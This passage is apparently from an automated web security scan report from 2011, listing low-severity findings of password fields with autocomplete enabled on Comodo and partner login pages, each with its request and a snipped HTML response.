Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.3.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:15:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 55422

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.21. http://www.comodo.com/login/comodo-members.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
   <p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.22. https://www.comodo.com/login/comodo-members.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:40 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
   <p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.23. http://www.comodopartners.com/partner/evssl.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/evssl.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:18 GMT
Content-Type: text/html
Content-Length: 8506
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.24. http://www.comodopartners.com/partner/partnerdoc.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/partnerdoc.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:16 GMT
Content-Type: text/html
Content-Length: 17656
Last-Modified: Tue, 01 Feb 2011 23:59:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.25. http://www.comodopartners.com/partner/rootkey.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/rootkey.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 9626
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.26. http://www.comodopartners.com/partner/trustlogo.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/trustlogo.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 8498
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.27. http://www.contentverification.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:48 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Brand
...[SNIP]...
<div id="loginb" style="top: 5px;right:5px;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onSubmit="return
submitLoginForm(this.loginName, this.loginPassword)">


Account Login <input name="loginName" id="loginName" size="10" type="text" />
<input size="10" onFocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.28. http://www.contentverification.com/confidence_pak-buy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /confidence_pak-buy.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/confidence_pak.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:00:00 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 7751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Conte
...[SNIP]...
</ul>
<form name="formN" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="currency" />
...[SNIP]...
</strong>
<input type="password" name="loginPassword" value="" /></p>
...[SNIP]...

7.29. http://www.contentverification.com/logos/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /logos/index.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 26684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</h1>
<form name="logo" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="ap" value="contentverification.com" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

7.30. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /ssl-certificate-products/addsupport/ssl-purchase.html?items=price_retail_comodoevssl_2yr&x=12&y=3 HTTP/1.1
Host: www.enterprisessl.com
Proxy-Connection: keep-alive
Referer: http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-evssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.enterprisessl.com/; __utma=1.33002135.1316365450.1316365450.1316365450.1; __utmb=1.1.10.1316365450; __utmc=1; __utmz=1.1316365450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:03:09 GMT
Content-Type: text/html
Last-Modified: Fri, 02 Sep 2011 05:12:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 89573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Digital SSL Certi
...[SNIP]...
<div class="productcontainer" >
           
       <form onSubmit="return validate( );" name="evssl" id="evssl" method="post" action="https://secure.comodo.net/products/!PlaceOrder">
               <input name="contractSignerName" type="hidden" id="contractSignerName" value="" />
...[SNIP]...
<td align="left" valign="top"><input name="loginPassword" type="password" id="loginPassword" value="" size="48" />&nbsp; </td>
...[SNIP]...
<td align="left" valign="top"><input name="verifyPassword" type="password" id="verifyPassword" value="" size="48" /></td>
...[SNIP]...

7.31. https://www.enterprisessl.com/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.enterprisessl.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
   <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
       <table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...
<td align="left" valign="middle" class="secure-login">
                           <input size="10" onfocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
                           <input value="US" type="hidden" />
...[SNIP]...

7.32. https://www.hackerguardian.com/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: http://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:14 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3472
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optim
...[SNIP]...
</p>
<form name="loginForm" method="post" action="https://www.hackerguardian.com/sas/j_spring_security_check" onsubmit="return check_login()" style="padding:0px;margin:0px;display:inline;">
<table border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
<td align="left" valign="top"><input type="password" name="j_password" id="pass" value="" />&nbsp;&nbsp;</td>
...[SNIP]...

7.33. https://www.hackerguardian.com/sas/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /sas/login.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /sas/login.jsp?login_error=1 HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2A3716140579B8BF0E1C67C566A441BE; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:25 GMT
Server: Apache
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 18594


<!DOCTYPE HTML>


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
Hacker Guardian
</title>

...[SNIP]...
<!-- [begin] body content -->

           
<form id="j_spring_security_check" name="userLoginForm" onsubmit="return true;" action="j_spring_security_check" method="post">

<table width="760" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<div id="wwctrl_j_spring_security_check_j_password" class="wwctrl">
<input type="password" name="j_password" size="22" id="j_spring_security_check_j_password" style="width: 150px;text-align:left"/></div>
...[SNIP]...

7.34. https://www.instantssl.com/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.instantssl.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.instantssl.com
Connection: keep-alive
Referer: http://www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/ssl-certificates/free-ssl-cert.php; entryURL=http%3A//www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:49 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 14114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimi
...[SNIP]...
<div id="loginform" style="overflow:hidden; ">
   <form name="loginForm" method="post" action="https://secure.instantssl.com/products/!hostedLogin" onSubmit="return submitLoginForm(this.loginName, this.loginPassword)" style="padding:0px;margin:0px;display:inline;">
   <p style="width:150px; float:left; font-size:12px; color:#666666; padding-right:5px;">
...[SNIP]...
<input type="hidden" name="region" />
           <input name="loginPassword" class="password" type="password" style="width:150px; height:17px;" value="" onClick="this.value='';" />
   </p>
...[SNIP]...

7.35. https://www.j2.com/jconnect/twa/page/homePage

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.j2.com
Path:   /jconnect/twa/page/homePage

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /jconnect/twa/page/homePage HTTP/1.1
Host: www.j2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:00 GMT
Server: Apache
X-TWAInstance: WPA5J1
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:27022
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link type="image/icon" href="/jconnect/resources/jconnect2/en2/ima
...[SNIP]...
</div><form method="POST" action="/jconnect/twa/login"><div style="width:166px;">
...[SNIP]...
<td><input class="textInput" maxlength="14" size="5" name="password" type="password"/></td>
...[SNIP]...

7.36. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doGetLocationManagement HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:11 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.37. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doGetLocationManagement HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:26 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 8694


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<br />
<form name="locationManager" action="/PCICS/MerController/doLocationManagement" method="post" onsubmit="return confirmLocationManagerFormSubmission();">
<input type="hidden" name="isCopySAQAnswers" value="No" />
...[SNIP]...
<td><input type="password" name="userPassword" value="" size="32" /></td>
...[SNIP]...

7.38. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
